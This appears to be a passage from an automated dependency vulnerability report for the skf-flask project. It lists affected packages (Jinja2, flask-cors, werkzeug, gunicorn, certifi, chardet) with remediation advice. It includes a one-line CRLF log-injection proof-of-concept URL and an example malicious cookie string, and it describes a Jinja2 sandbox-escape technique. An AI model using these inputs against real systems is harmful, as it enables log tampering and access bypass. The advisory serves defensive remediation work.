Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-bcrypt@0.7.1 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-bcrypt@0.7.1.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cli@0.4.0 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-cli@0.4.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-cors@3.0.10.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-restplus@0.13.0 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-restplus@0.13.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-sqlalchemy@2.5.1 › flask@1.1.2 › jinja2@2.11.3Remediation: Upgrade to flask-sqlalchemy@2.5.1.
Overview
Jinja2 is a template engine written in pure Python. It provides a Django inspired non-XML syntax but supports inline expressions and an optional sandboxed environment.
Affected versions of this package are vulnerable to Template Injection through the |attr
filter. An attacker that controls the content of a template can escape the sandbox and execute arbitrary Python code by using the |attr
filter to get a reference to a string's plain format method, bypassing the environment's attribute lookup.
Note:
This is only exploitable if the application executes untrusted templates.
Remediation
Upgrade Jinja2
to version 3.1.6 or higher.
References
medium severity
- Module: certifi
- Introduced through: elastic-apm@6.0.0, requests@2.25.1 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › elastic-apm@6.0.0 › certifi@2025.8.3
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › requests@2.25.1 › certifi@2025.8.3
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › certifi@2025.8.3
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests@2.25.1 › certifi@2025.8.3
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-api-core@1.34.1 › requests@2.25.1 › certifi@2025.8.3
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests-oauthlib@2.0.0 › requests@2.25.1 › certifi@2025.8.3
MPL-2.0 license
medium severity
- Module: chardet
- Introduced through: requests@2.25.1, kubernetes@12.0.1 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › requests@2.25.1 › chardet@4.0.0
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests@2.25.1 › chardet@4.0.0
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › google-api-python-client@2.0.2 › google-api-core@1.34.1 › requests@2.25.1 › chardet@4.0.0
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › kubernetes@12.0.1 › requests-oauthlib@2.0.0 › requests@2.25.1 › chardet@4.0.0
LGPL-2.1 license
low severity
- Vulnerable module: flask-cors
- Introduced through: flask-cors@3.0.10
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10Remediation: Upgrade to flask-cors@4.0.1.
Overview
Flask-Cors is an A Flask extension adding a decorator for CORS support
Affected versions of this package are vulnerable to Log Injection when the log level is set to debug. A user can inject or modify messages by abusing CRLF sequences in the request path of a GET request.
PoC
http://127.0.0.1:5000/api/test%0D%0A%0D%0ALOGINJECTION%0D%0A%0D%0A
Remediation
Upgrade Flask-Cors
to version 4.0.1 or higher.
References
low severity
- Vulnerable module: werkzeug
- Introduced through: werkzeug@0.16.1, flask@1.1.2 and others
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › werkzeug@0.16.1Remediation: Upgrade to werkzeug@2.2.3.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask@1.1.2.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-bcrypt@0.7.1 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-bcrypt@0.7.1.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cli@0.4.0 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-cli@0.4.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-cors@3.0.10 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-cors@3.0.10.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-restplus@0.13.0 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-restplus@0.13.0.
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › flask-sqlalchemy@2.5.1 › flask@1.1.2 › werkzeug@0.16.1Remediation: Upgrade to flask-sqlalchemy@2.5.1.
Overview
Affected versions of this package are vulnerable to Access Restriction Bypass that allows a malicious application on an adjacent subdomain to present "nameless" cookies that look like =value
instead of key=value
and have them accepted by the affected browser. For example, a cookie like =__Host-test=bad
would be parsed as __Host-test=bad
and the key treated as valid while the value is ignored.
Remediation
Upgrade werkzeug
to version 2.2.3 or higher.
References
low severity
- Vulnerable module: gunicorn
- Introduced through: gunicorn@20.0.4
Detailed paths
-
Introduced through: blabla1337/skf-flask@blabla1337/skf-flask#82d270ad59e267843f70992b2bb86658fa27baf6 › gunicorn@20.0.4Remediation: Upgrade to gunicorn@21.2.0.
Overview
gunicorn is a Python WSGI HTTP Server for UNIX
Affected versions of this package are vulnerable to Improper Check for Unusual or Exceptional Conditions due to the use of time.time()
in worker timeout logic, which may be wrong. An attacker who can control the system time can force a worker to time out.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
ws
package
Remediation
Upgrade gunicorn
to version 21.2.0 or higher.